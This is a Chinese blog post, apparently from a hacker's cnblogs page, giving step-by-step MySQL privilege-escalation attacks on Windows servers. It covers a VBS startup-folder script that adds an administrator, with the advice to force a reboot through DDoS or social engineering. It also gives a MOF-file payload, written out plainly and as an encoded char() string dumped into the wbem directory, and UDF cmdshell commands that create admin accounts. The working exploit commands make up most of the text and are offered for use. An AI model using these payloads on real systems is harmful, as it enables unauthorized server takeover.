zoukankan      html  css  js  c++  java
  • mysql提权常用方法。 hack某某

    一般是root权限,知道mysql root权限,root账号密码

    启动项提权:
    原理:利用高权限的root写入一个vbs脚本到启动项,再通过一些方法如ddos,社工管理员之类的方法来让服务器重启,运行脚本,达到提取目的
    1、查看我们进入数据库中有些什么数据表
    mysql>show tables;
    默认的情况下,test中没有任何表的存在。
    以下为关键的部分
    2、在TEST数据库下创建一个新的表;
    mysql>create table a (cmd text);
    好了,我们创建了一个新的表,表名为a,表中只存放一个字段,字段名为cmd,为text文本。
    3、在表中插入内容
    mysql>insert into a values (“set wshshell=createobject (“”wscript.shell””)”);
    mysql>insert into a values (“a=wshshell.run (“”cmd.exe /c net user 1 1 /add””,0)”);
    mysql>insert into a values (“b=wshshell.run (“”cmd.exe /c net localgroup Administrators 1 /add””,0)”);
    注意双引号和括号以及后面的“0”一定要输入!我们将用这三条命令来建立一个VBS的脚本程序!
    4、好了,现在我们来看看表a中有些什么
    mysql>select * from a;
    我们将会看到表中有三行数据,就是我们刚刚输入的内容,确认你输入的内容无误后,我们来到下一步
    5、输出表为一个VBS的脚本文件
    mysql>select * from a into outfile “c://docume~1//administrator//「开始」菜单//程序//启动//digo8.vbs”;
    6.重启即可!

    Mof提权:
    mysql mof漏洞介绍:
    http://www.exploit-db.com/exploits/23083/
    http://www.exploit-db.com/sploits/23083.zip

    mof文件内容为:

    #pragma namespace(“\\.\root\subscription”)

    instance of __EventFilter as $EventFilter
    {
    EventNamespace = “Root\Cimv2”;
    Name = “filtP2”;
    Query = “Select * From __InstanceModificationEvent ”
    “Where TargetInstance Isa ”Win32_LocalTime” ”
    “And TargetInstance.Second = 5”;
    QueryLanguage = “WQL”;
    };

    instance of ActiveScriptEventConsumer as $Consumer
    {
    Name = “consPCSV2”;
    ScriptingEngine = “JScript”;
    ScriptText =
    “var WSH = new ActiveXObject(”WScript.Shell”) WSH.run(”net.exe user admin admin /add”)”;
    };

    instance of __FilterToConsumerBinding
    {
    Consumer = $Consumer;
    Filter = $EventFilter;
    };

    效果就是添加一个用户admin密码admin;

    select char(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,108,111,99,97,108,103,114,111,117,112,32,97,100,109,105,110,105,115,116,114,97,116,111,114,115,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;

    效果就是添加一个用户admin密码admin; 管理组

    SELECT CHAR(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,117,115,101,114,32,97,100,109,105,110,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) INTO dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;

    现在默认它还是会过5s添加一次用户,解决方法就是:
    第一 net stop winmgmt 停止服务,
    第二 删除文件夹:C:WINDOWSsystem32wbemRepository
    第三 net start winmgmt 启动服务

    UDF提权,推荐暗月的一款脚本

    当然也可以dos下直接连接数据库,执行下列语句,方法大同小异
    create function cmdshell returns string soname ‘udf.dll’
    select cmdshell(‘net user iis_user 123!@#abcABC /add’);
    select cmdshell(‘net localgroup administrators iis_user /add’);
    select cmdshell(‘regedit /s d:web3389.reg’);
    drop function cmdshell;
    select cmdshell(‘netstat -an’);

    我还是那个帅气的某某

    qq2553083572

  • 相关阅读:
    解决PowerDesigner中DBMS设置的问题-创建物理模型时DBMS选项为空
    转载 缓存技术Redis在C#中的使用及Redis的封装
    T4模版 mysql
    T4 模版应用类
    在点击run之后,没有显示任何设备,这一般是adb的问题,解决方法是重新启动adb
    webapi 返回不同格式的数据
    使用elk+redis搭建nginx日志分析平台
    [C#]使用WebClient上传文件并同时Post表单数据字段到服务端
    关于AJAX跨域调用ASP.NET MVC或者WebAPI服务的问题及解决方案
    2019.12.09-新闻列表布局代码
  • 原文地址:https://www.cnblogs.com/hack-moumou/p/5903870.html
Copyright © 2011-2022 走看看